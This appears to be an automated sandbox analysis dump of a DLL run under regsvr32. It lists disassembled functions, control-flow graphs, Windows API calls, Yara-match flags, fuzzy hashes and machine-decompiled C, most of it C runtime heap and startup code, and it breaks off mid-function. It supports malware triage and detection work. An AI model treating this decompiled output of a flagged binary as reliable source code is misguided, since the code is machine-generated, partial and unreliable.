                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %DcZ$L\`$u%$vr
                                    • API String ID: 0-873403245
                                    • Opcode ID: 2030f1da5196c9f476bb93962b4ebdec29646a183379a03d07fdefea4280d3e9
                                    • Instruction ID: 7a4330a3d3912fed14e69a2d18b4041e28774fe6b527757d4cbe653c4a95fa98
                                    • Opcode Fuzzy Hash: 2030f1da5196c9f476bb93962b4ebdec29646a183379a03d07fdefea4280d3e9
                                    • Instruction Fuzzy Hash: 0912F47152068CDFCB8CDF28C88AADD7BA1FB48398F956219FD0A97250D774D984CB84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180001D58 Relevance: 5.3, Strings: 4, Instructions: 321COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 584 180001d58-180001d95 585 180001d9a 584->585 586 180001d9c-180001da2 585->586 587 180001da8-180001dae 586->587 588 18000248e 586->588 590 180001db4-180001dba 587->590 591 180002197-1800021a4 587->591 589 180002493-180002499 588->589 589->586 596 18000249f-1800024ac 589->596 592 180001e9b-18000201d call 18000eef4 call 1800196ec 590->592 593 180001dc0-180001dc6 590->593 594 1800021a6-1800021ac 591->594 595 1800021ae-1800021ca 591->595 610 180002024-18000218c call 1800196ec call 180008db0 592->610 611 18000201f 592->611 593->589 597 180001dcc-180001e8b call 18001c158 593->597 598 1800021d0-180002470 call 18001d014 call 1800196ec call 180008db0 594->598 595->598 597->596 606 180001e91-180001e96 597->606 614 180002475-18000247d 598->614 606->586 610->596 619 180002192 610->619 611->610 614->596 616 18000247f-180002489 614->616 616->586 619->585
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .mZ$\$~V6k$%T
                                    • API String ID: 0-3287852823
                                    • Opcode ID: ccbc70a1b43ffc6d5414b274ff0ecbed60153be03e3051f192a6aa15e06d1cac
                                    • Instruction ID: 166b9a2b8c7d7ea13ff64321e1c32e26f96a2e299ccb60065a18498a6503f561
                                    • Opcode Fuzzy Hash: ccbc70a1b43ffc6d5414b274ff0ecbed60153be03e3051f192a6aa15e06d1cac
                                    • Instruction Fuzzy Hash: 0402E8711013C8CBEBBECFA4D885BD97BA9FB44B44F10661AE84AAE250CBB45745CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D28860 Relevance: 4.5, APIs: 3, Instructions: 25memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 620 7fef9d28860-7fef9d2888b HeapCreate 621 7fef9d28891-7fef9d288a5 GetVersion 620->621 622 7fef9d2888d-7fef9d2888f 620->622 623 7fef9d288c1 621->623 624 7fef9d288a7-7fef9d288bb HeapSetInformation 621->624 625 7fef9d288c6-7fef9d288ca 622->625 623->625 624->623
                                    APIs
                                    • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28876
                                    • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28891
                                    • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D288BB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Heap$CreateInformationVersion
                                    • String ID:
                                    • API String ID: 3563531100-0
                                    • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                    • Instruction ID: 9235811b63a60011062a1442a231d54292fe2d432e51c42db702af6c27d11e97
                                    • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                    • Instruction Fuzzy Hash: 50F0FE74A18A4282F7949729AC0977E63D0B758345FA1C43696CD826B4DF3F9589C601
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002C6C8 Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 078$GDo$}
                                    • API String ID: 0-303245572
                                    • Opcode ID: 8956c442c33fd1cde17bd2344d54593dce01cac8c777ad426ea07fe8eec3f5fb
                                    • Instruction ID: 0c94e6823936b68487d3afc04f5daf4118d9ac6b30c0afcc694cd4a40111a1d0
                                    • Opcode Fuzzy Hash: 8956c442c33fd1cde17bd2344d54593dce01cac8c777ad426ea07fe8eec3f5fb
                                    • Instruction Fuzzy Hash: 32D1CAB051A784AFC398DF28C1CA94BBBE0FB84754F906A1DF88686260D7B0D945CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180025C30 Relevance: 3.8, Strings: 3, Instructions: 79COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: e@-0$f $wC
                                    • API String ID: 0-2741453468
                                    • Opcode ID: 6e670c046987691f0a1e9af823784eece018238e228c51a72b7d39087d84c909
                                    • Instruction ID: f8f9b13c1cb793f3116966172e7ed192e0f5529545d7cab8ca7c6d0d9d04acad
                                    • Opcode Fuzzy Hash: 6e670c046987691f0a1e9af823784eece018238e228c51a72b7d39087d84c909
                                    • Instruction Fuzzy Hash: E2319571518B848FD3A8DF28C48975ABBE1FB84344F608A1DE6DACB260DB709549CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002C2C8 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: L=`$rKS(
                                    • API String ID: 0-4157335196
                                    • Opcode ID: 0ffd1ea2413f9b71380f5aeaf5e19bad7dcec336af59defbaf39c2d3ae1cfae5
                                    • Instruction ID: c6b4aee86e77721e5ec6a37c1ce5251b52915c7d30808e23b45806a77bf6ffc0
                                    • Opcode Fuzzy Hash: 0ffd1ea2413f9b71380f5aeaf5e19bad7dcec336af59defbaf39c2d3ae1cfae5
                                    • Instruction Fuzzy Hash: FD51BC705183848FC769DF29C18A64BBBF1FBC6784F108A1DE69A86261D772D909CF43
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180026410 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 8h
                                    • API String ID: 0-2787117397
                                    • Opcode ID: d20b5c2dabe29708a31ba0e8275e2e5ac6bcf12f9e6970397621dbc27d768f27
                                    • Instruction ID: eb392778bd881193a348804f8d52045fa41d3382a0d9eae0dd8f361f159f4541
                                    • Opcode Fuzzy Hash: d20b5c2dabe29708a31ba0e8275e2e5ac6bcf12f9e6970397621dbc27d768f27
                                    • Instruction Fuzzy Hash: 28D12E7060578C8FEBBADF24CC997DE3BA0FB49744F504219D88A8E260CB745B49CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D27640 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 290COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 160 7fef9d27640-7fef9d27671 GetStartupInfoW call 7fef9d24980 162 7fef9d27676-7fef9d27687 160->162 163 7fef9d27693-7fef9d276ac 162->163 164 7fef9d27689-7fef9d2768e 162->164 166 7fef9d276c2-7fef9d276d7 163->166 165 7fef9d27cee-7fef9d27cf5 164->165 167 7fef9d2777d-7fef9d27784 166->167 168 7fef9d276dd-7fef9d27778 166->168 170 7fef9d27ad6-7fef9d27afb 167->170 171 7fef9d2778a-7fef9d27790 167->171 168->166 174 7fef9d27b01-7fef9d27b2e 170->174 175 7fef9d27ce0-7fef9d27cec SetHandleCount 170->175 171->170 172 7fef9d27796-7fef9d277de 171->172 176 7fef9d277f0 172->176 177 7fef9d277e0-7fef9d277ee 172->177 178 7fef9d27b30-7fef9d27b3c 174->178 179 7fef9d27b42-7fef9d27b56 174->179 175->165 180 7fef9d277fb-7fef9d27833 176->180 177->180 178->179 181 7fef9d27cc0-7fef9d27cd8 178->181 182 7fef9d27b65-7fef9d27b6d 179->182 183 7fef9d27b58-7fef9d27b63 179->183 189 7fef9d27975-7fef9d279c7 180->189 190 7fef9d27839-7fef9d2786e call 7fef9d24980 180->190 185 7fef9d27cdb 181->185 186 7fef9d27b6f-7fef9d27b7a 182->186 187 7fef9d27b7c 182->187 188 7fef9d27b95-7fef9d27bb3 GetStdHandle 183->188 185->175 193 7fef9d27b87-7fef9d27b8e 186->193 187->193 194 7fef9d27c95-7fef9d27cb7 188->194 195 7fef9d27bb9-7fef9d27bc2 188->195 189->170 199 7fef9d279cd-7fef9d279d9 189->199 200 7fef9d27870-7fef9d2787d 190->200 201 7fef9d27882-7fef9d278ac 190->201 193->188 197 7fef9d27cbe 194->197 195->194 198 7fef9d27bc8-7fef9d27be5 GetFileType 195->198 197->185 198->194 202 7fef9d27beb-7fef9d27c0d 198->202 203 7fef9d27ad1 199->203 204 7fef9d279df-7fef9d279eb 199->204 200->189 205 7fef9d278c2-7fef9d278e3 201->205 206 7fef9d27c0f-7fef9d27c29 202->206 207 7fef9d27c2b-7fef9d27c3a 202->207 203->170 204->203 208 7fef9d279f1-7fef9d27a01 204->208 210 7fef9d27970 205->210 211 7fef9d278e9-7fef9d2796b 205->211 212 7fef9d27c56-7fef9d27c72 InitializeCriticalSectionAndSpinCount 206->212 207->212 213 7fef9d27c3c-7fef9d27c53 207->213 208->203 209 7fef9d27a07-7fef9d27a17 208->209 214 7fef9d27a32-7fef9d27aad InitializeCriticalSectionAndSpinCount 209->214 215 7fef9d27a19-7fef9d27a2c GetFileType 209->215 210->189 211->205 217 7fef9d27c74-7fef9d27c79 212->217 218 7fef9d27c7b-7fef9d27c93 212->218 213->212 219 7fef9d27aaf-7fef9d27ab4 214->219 220 7fef9d27ab9-7fef9d27ace 214->220 215->203 215->214 217->165 218->197 219->165 220->203
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                    • API String ID: 1930727954-3864165772
                                    • Opcode ID: ad15c381301d28b8263a0ad4c3d04fd02eedca4ba797fff4e6a56cbc154e2c0b
                                    • Instruction ID: 04d5086f9a303f60624db38f474b136a55c048ce8eacbf8a5fedaf0ba48a359d
                                    • Opcode Fuzzy Hash: ad15c381301d28b8263a0ad4c3d04fd02eedca4ba797fff4e6a56cbc154e2c0b
                                    • Instruction Fuzzy Hash: DDF1D82260DBC5C9E7B08B19E88076EB7A0F385B64F258226CAED477E4DB3DD445CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D27DE0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 109COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                    • String ID: _setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                    • API String ID: 1648969265-681193798
                                    • Opcode ID: 1267f019c7e433370f87e7d76307e13ae481beb469170db0d9b2813ec215c0ca
                                    • Instruction ID: dee10c55842e2b838f4c2249843f6d7af4c066fce2f7611d1afded1b25fdeaa1
                                    • Opcode Fuzzy Hash: 1267f019c7e433370f87e7d76307e13ae481beb469170db0d9b2813ec215c0ca
                                    • Instruction Fuzzy Hash: D0514F31A1CA8682EB90CB19E88576E77E0F385794F704126EACE477B4DB7EE4408B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D27280 Relevance: 12.1, APIs: 8, Instructions: 104COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                    • String ID:
                                    • API String ID: 3799933513-0
                                    • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                    • Instruction ID: 37cfb5e84e154ae2fbcc5f75e30e47dd1cf7b4373ba061ec72f9a9691eeac49a
                                    • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                    • Instruction Fuzzy Hash: 36511C3291DB4281E6A09B58EC8436EB7E0F386794F315125EACD427B9DF7EE544CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D28670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                    • API String ID: 1823725401-2473407871
                                    • Opcode ID: 2fea13ac07d8f022f3d86b1cc1b99bf950f7c5081f441752a002fe175989ec87
                                    • Instruction ID: ccbee8cdd8044984a813dbfd6c9bb6ca90d3427a1697cce954f0caea4fdd0345
                                    • Opcode Fuzzy Hash: 2fea13ac07d8f022f3d86b1cc1b99bf950f7c5081f441752a002fe175989ec87
                                    • Instruction Fuzzy Hash: 8B41A536618B8586E794CB56F84432FB7E1F785B94F200429EBCD47B68DBBED4548B00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D23D30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000007FEF9D27540: _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                      • Part of subcall function 000007FEF9D27540: _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                      • Part of subcall function 000007FEF9D28FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000007FEF9D2906F
                                    • FlsAlloc.KERNEL32 ref: 000007FEF9D23D55
                                      • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                      • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                    • API String ID: 3828364660-3898981997
                                    • Opcode ID: 3be25d5429145f193b8b5ac72c588d3aab3a3dcc72f716665f31abf408c046fa
                                    • Instruction ID: b9f7c2a4cabba63d90327ac94b1883ffc0a3f64b25b31a8ae36976c45a874ec4
                                    • Opcode Fuzzy Hash: 3be25d5429145f193b8b5ac72c588d3aab3a3dcc72f716665f31abf408c046fa
                                    • Instruction Fuzzy Hash: 37115E30A2D60286F3E0AB29ED4577DA6E1B784B60F214275E9EE422F5DB2FE4048601
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2461B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 50%
                                    			E000007FE7FEF9D2461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
				signed int _t64;
				intOrPtr _t66;
				void* _t73;
				void* _t92;
				long long _t98;
				long long _t113;
				long long _t114;
				long long _t115;
				long long _t130;
				intOrPtr _t132;
				long long _t135;

				if (_a136 == 1) goto 0xf9d24672;
				_t64 = _a136 & 0x0000ffff;
				if (_t64 == 2) goto 0xf9d24672;
				if (_a136 == 3) goto 0xf9d24672;
				_a40 = "Error: memory allocation: bad memory block type.\n";
				_a32 = "%s";
				r9d = 0;
				r8d = 0;
				0xf9d2ad00();
				if (_t64 != 1) goto 0xf9d24672;
				asm("int3");
				_t98 = _a128 + 0x34;
				_a96 = _t98;
				0xf9d2ac90(); // executed
				_a80 = _t98;
				if (_a80 != 0) goto 0xf9d246b8;
				if (_a160 == 0) goto 0xf9d246b3;
				 *_a160 = 0xc;
				goto 0xf9d248b4;
				_t66 =  *0xf9d4b03c; // 0x38
				 *0xf9d4b03c = _t66 + 1;
				if (_a64 == 0) goto 0xf9d2472d;
				 *_a80 = 0;
				 *((long long*)(_a80 + 8)) = 0;
				 *((long long*)(_a80 + 0x10)) = 0;
				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
				 *((long long*)(_a80 + 0x20)) = _a128;
				 *(_a80 + 0x1c) = 3;
				 *((intOrPtr*)(_a80 + 0x28)) = 0;
				goto 0xf9d24844;
				if (0xffffffff -  *0xf9d4c960 - _a128 <= 0) goto 0xf9d24763;
				_t130 =  *0xf9d4c960; // 0x42cc
				 *0xf9d4c960 = _t130 + _a128;
				goto 0xf9d2476e;
				 *0xf9d4c960 = 0xffffffff;
				_t132 =  *0xf9d4c990; // 0xa0c
				 *0xf9d4c990 = _t132 + _a128;
				_t113 =  *0xf9d4c978; // 0x32f4
				_t92 =  *0xf9d4c990 - _t113; // 0xa0c
				if (_t92 <= 0) goto 0xf9d247a8;
				_t114 =  *0xf9d4c990; // 0xa0c
				 *0xf9d4c978 = _t114;
				if ( *0xf9d4c980 == 0) goto 0xf9d247c4;
				_t115 =  *0xf9d4c980; // 0x2313b00
				 *((long long*)(_t115 + 8)) = _a80;
				goto 0xf9d247d0;
				 *0xf9d4c968 = _a80;
				_t135 =  *0xf9d4c980; // 0x2313b00
				 *_a80 = _t135;
				 *((long long*)(_a80 + 8)) = 0;
				 *((long long*)(_a80 + 0x10)) = _a144;
				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
				 *((long long*)(_a80 + 0x20)) = _a128;
				 *(_a80 + 0x1c) = _a136;
				_t78 = _a88;
				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
				 *0xf9d4c980 = _a80;
				r8d = 4;
				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
				_t145 = _a128;
				r8d = 4;
				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
				_t73 = E000007FE7FEF9D232B0( *0xf9d4b04f & 0x000000ff, _t78,  *0xf9d4b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
				_a72 = _a80 + 0x30;
				return E000007FE7FEF9D29360(_t73, 4);
			}














                                    0x7fef9d24623
                                    0x7fef9d2462c
                                    0x7fef9d24634
                                    0x7fef9d2463e
                                    0x7fef9d24647
                                    0x7fef9d24653
                                    0x7fef9d24658
                                    0x7fef9d2465b
                                    0x7fef9d24665
                                    0x7fef9d2466d
                                    0x7fef9d2466f
                                    0x7fef9d2467a
                                    0x7fef9d2467e
                                    0x7fef9d24688
                                    0x7fef9d2468d
                                    0x7fef9d24698
                                    0x7fef9d246a3
                                    0x7fef9d246ad
                                    0x7fef9d246b3
                                    0x7fef9d246b8
                                    0x7fef9d246c0
                                    0x7fef9d246cb
                                    0x7fef9d246d2
                                    0x7fef9d246de
                                    0x7fef9d246eb
                                    0x7fef9d246f8
                                    0x7fef9d2470c
                                    0x7fef9d24715
                                    0x7fef9d24721
                                    0x7fef9d24728
                                    0x7fef9d24743
                                    0x7fef9d2474d
                                    0x7fef9d2475a
                                    0x7fef9d24761
                                    0x7fef9d24763
                                    0x7fef9d24776
                                    0x7fef9d24783
                                    0x7fef9d2478a
                                    0x7fef9d24791
                                    0x7fef9d24798
                                    0x7fef9d2479a
                                    0x7fef9d247a1
                                    0x7fef9d247b0
                                    0x7fef9d247b2
                                    0x7fef9d247be
                                    0x7fef9d247c2
                                    0x7fef9d247c9
                                    0x7fef9d247d5
                                    0x7fef9d247dc
                                    0x7fef9d247e4
                                    0x7fef9d247f9
                                    0x7fef9d24809
                                    0x7fef9d24819
                                    0x7fef9d24829
                                    0x7fef9d24831
                                    0x7fef9d24835
                                    0x7fef9d2483d
                                    0x7fef9d24854
                                    0x7fef9d2485c
                                    0x7fef9d2486d
                                    0x7fef9d2487a
                                    0x7fef9d24882
                                    0x7fef9d248a1
                                    0x7fef9d248af
                                    0x7fef9d248c7

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _unlock
                                    • String ID: Error: memory allocation: bad memory block type.
                                    • API String ID: 2480363372-1537269110
                                    • Opcode ID: 070c00f70d4df6f813f84e43e5590717d4ebcb6a3ae1d4e5f47ac26a0ae5b61c
                                    • Instruction ID: 5caffd3b8bb6e9a751bf86ff06ba01468230100948e3856d22c691b184e429db
                                    • Opcode Fuzzy Hash: 070c00f70d4df6f813f84e43e5590717d4ebcb6a3ae1d4e5f47ac26a0ae5b61c
                                    • Instruction Fuzzy Hash: 6B71EB36A09B8586DBA0CB59E89036EB7E0F3C9B90F218526DADD437A4DF7DD044CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D26FF2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EncodePointer_initterm_e
                                    • String ID: Y
                                    • API String ID: 1618838664-1754117475
                                    • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                    • Instruction ID: e2eda9ea6841371ef03f52dec0317b7f8d7542193ab5d09d46fee122be74aa2a
                                    • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                    • Instruction Fuzzy Hash: 1DE0C22190C042A7FAA1AB24ED453BE63E0B791344FA14231E2CD824B5EB2FF908CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D23110 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 8COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E000007FE7FEF9D23110(void* __eflags, long long* __rax) {
				void* _t7;
				intOrPtr _t8;
				void* _t10;

				_t8 =  *0xf9d4c3c8; // 0x180000000
